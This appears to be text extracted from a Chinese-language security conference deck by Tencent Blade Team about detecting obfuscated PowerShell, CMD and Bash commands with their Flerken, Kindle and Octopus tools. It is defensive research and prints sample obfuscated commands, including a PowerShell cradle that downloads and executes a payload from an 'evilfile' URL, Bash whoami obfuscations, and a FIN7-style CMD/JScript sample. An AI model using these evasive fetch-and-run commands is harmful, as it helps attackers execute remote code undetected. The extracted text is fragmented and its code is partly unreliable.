1、猫鼠游戏:持续渗透中的高级命令混淆对抗 张尧 曾智洋 Tencent Blade Team Tencent Blade Team 受邀参加Blackhat USA、DEFCON、HITB、CanSecWest、CSS、XCon、KCon等多个海内外顶级安全会议 多次受邀参加 海内外顶级安全会议 Amazon、小米、华为等多个品牌官方认可，获小米安全年度最佳守护者，荣获华为漏洞奖励计划官方认可 获Amazon、小米、华为等多个品牌官方认可 为腾讯Tday、腾讯首届技术文化周等活劢输出泛安全影响力 输出全行业 泛安全影响力 成功发现首个TensorFlow框架自身安全漏洞，并包揽TF已知前七个漏洞

2、 谷歌TensorFlow 成功发现SQLite存在严重漏洞，影响Chromium浏览器和大量Android、iOS应用 发现SQLite严重漏洞 成功破解Amazon Echo、Google Home、小米智能音箱等IoT设备 深耕IoT领域 目录 1.问题背景：命令混淆 2.命令混淆方法 3.我们的解决方案 4.总结与讨论 1.问题背景：命令混淆 1.1 什么是混淆？1.2 命令混淆 范畴：特指操作系统原生的三个命令行程序PS/CMD.exe/Bash 对象：命令行（Command Line）常规命令 方法：基于上述三种命令行程序灵活的语法进行变形 目标：绕过目标防御设备、端点保护系统、杀

3、软的恶意命令检测 1.3 攻击路径示例Windows篇 通过漏洞进入，如永恒之蓝 目标主机 使用PS/CMD 远控服务器 将混淆命令下载至内存 内存中利用 将混淆命令放入内存 IDS/EDR/杀软 绕过 1.4 攻击路径示例Linux篇 目标主机 扫描渗透 远控服务器 使用Bash 绕过 直接执行混淆命令 下载混淆命令并执行 企业内网 IDS/EDR 通过漏洞组件进入，如WebLogic 2.命令混淆方法 2.1 简单的PowerShell混淆 Round 1 Invoke-Expression(New-Object System.Net.WebClient).DownloadString(h

4、ttp:/127.0.0.1/evilfile)Round 2 Round 3 invoke-exPressioN(+Ne+w+-+Object S)+(y+ste)+(m+.Net)+(.+WebCl)+ie+nt+()+.Dow)+(nlo+a)+dS+(tri+n)+(g(C+82h)+(t+tp:)+/+/1+(27+.0.)+(0.+1/ev+i)+(lfi+l+eC82).rEPlACE(C+82),StriNgCHaR34)Invoke-Expression(New-Object Net.WebClient).(DownloadString).Invoke(h+ttp:/127.

5、0.0.1/evilfile)echo$x77ho$u0000ami|bash 2.2 简单的Bash混淆 Round 1 whoami Round 3 Round 5 echo$x77ho$u0000ami|$(echo$(echo aHMK|base64-d)ab|rev)echo$x77ho$u0000ami|$(echo hsab|rev)Round 2 echo whoami|bash Round 4 2.3 命令混淆工具 CMD命令混淆工具：Invoke-DOSfuscation Powershell命令混淆工具：Invoke-Obfuscation、PS_obfs Bash命令混

6、淆工具：Bashfuscator、bashfuck 2.4 混淆样本示例 APT组织FIN 7中的混淆样本 PowerShell无文件木马混淆 Bashfuscator工具生成的混淆命令 3.我们的解决方案 3.1 新攻击向量带来的攻守失衡 新型混淆工具的开源让新型混淆工具的开源让混淆变得轻而易举混淆变得轻而易举 开源开源PS/CMD/BashPS/CMD/Bash混淆工具众多混淆工具众多 检测方法寥寥无几，误报很多，检测方法寥寥无几，误报很多，特别针对特别针对Linux混淆，业界尚无混淆，业界尚无已知解决方法已知解决方法 企业大规模服务器命令数据企业大规模服务器命令数据加剧命令混淆检测难度加

7、剧命令混淆检测难度 防御方案的不足进一步防御方案的不足进一步引起攻守的失衡引起攻守的失衡 3.2 提出解决方法Flerken：从一石二鸟到双塔奇兵 出发点：是否存在统一的混淆检测方案？出发点：是否存在统一的混淆检测方案？NO 语法特征差异性语法特征差异性 统计特征差异性统计特征差异性 数据规模差异性数据规模差异性 大小写敏感性 特殊字符使用 ,/,等区别 命令长短引起的统计特征差异性 Windows服务器规模远小于Linux服务器，加剧了训练数据的不平衡性 多特征维度深入分析 底层原因底层原因 Windows(CMD/Powershell)vs Linux(Bash)解决思路解决思路 Kind

8、le Octopus Linux命令混淆检测方法命令混淆检测方法 Windows命令混淆检测方法命令混淆检测方法 3.3 Kindle：基于可读性的Windows混淆检测 Windows(CMD/Powershell)混淆与常规业务命令随机抽样对比混淆与常规业务命令随机抽样对比 常人（常人（Human）可以有效识别混淆）可以有效识别混淆/非混淆命令非混淆命令 核心观察核心观察 根本问题：影响这一判断的本质特征是什么？根本问题：影响这一判断的本质特征是什么？可读性程度可读性程度 单词可读性单词可读性 符号可读性符号可读性 整体长度整体长度 元音比例元音比例 大写字母比例大写字母比例 首字母大写首

9、字母大写 字母重复字母重复 非混淆命令非混淆命令 常见字符常见字符 其他常规统计特征其他常规统计特征 符号比例符号比例 空格比例空格比例 结合结合语言学统计语言学统计 分析的研究洞察分析的研究洞察 完成完成单词可读性单词可读性设计设计 kindle07 kindlemysql kindllle kinDle kindleisanextremelypopulartool 3.3 Kindle：基于可读性的Windows混淆检测 线性线性判断逻辑，增加告警可解释性判断逻辑，增加告警可解释性 invoke-exPressioN(+Ne+w+-+Object S)+(y+ste)+(m+.Net)+(

10、.+WebCl)+ie+nt+()+.Dow)+(nlo+a)+dS+(tri+n)+(g(C+82h)+(t+tp:)+/+/1+(27+.0.)+(0.+1/ev+i)+(lfi+l+eC82).rEPlACE(C+82),StriNgCHaR34)set w=wscript/b/e:jscript%HOMEPATH%tt.txt echo tryvar fs=new ActiveXObject(Scripting.FileSystemObject);sh=new ActiveXObject(Wscript.Shell);p=sh.ExpandEnvironmentStrings(%HOM

11、+EPATH%)+pp.txt;var f=fs.OpenTextFile(p,1,false);for(i=0;i%HOMEPATH%tt.txt copy/y%TMP%unlock.cmd%HOMEPATH%pp.txt echo%w:=%|cmd 不可读单词比例不可读单词比例 符号比例符号比例 不可读单词比例不可读单词比例 不可读符号比例不可读符号比例 3.3 Kindle：基于可读性的Windows混淆检测 线性判断逻辑，增加告警可解释性线性判断逻辑，增加告警可解释性 分类器学习分类器学习 特征向量化特征向量化 3.4 Octopus：基于静态分析的Bash混淆识别 混淆类型的研究混淆

12、类型的研究 多种混淆描述类型多种混淆描述类型 Linux混淆变形更为丰富，混淆变形更为丰富，但依然可用有限的语法模但依然可用有限的语法模式表达，表达效果取决于式表达，表达效果取决于模式描述的泛化程度模式描述的泛化程度 核心思路核心思路 3.4 Octopus：劢态语法解析下的Bash混淆识别 关键挑战：能否让语法解析关键挑战：能否让语法解析沙箱只解析，不执行？沙箱只解析，不执行？YES 3.4 Octopus bash 对近10万行Bash源码进行深入分析，标记关键执行凼数，并在最外层进行“去执行化”编译得到的Bash，称之为Octopus bash，可以还原混淆命令 进一步结合文本相似性算法Simhash，实现对于Bash命令混淆的高效识别 3.5 Flerken Demo Flerken demo：https:/flerken.pro GitHub link:https:/ 4.总结与讨论 4.1 总结与讨论 多平台命令混淆检测方案Flerken 近实时的企业服务器命令监控能力 已知样本、工具，检出率接近100%对抗升级、进一步优化 Octopus bash即将开源 尽管混淆语法模式非常多样，但问题并不是Too Complex to be solved 检测能力是核心，但不是全部 命令采集、数据裁剪 劢态分析下的统一解法？关注运营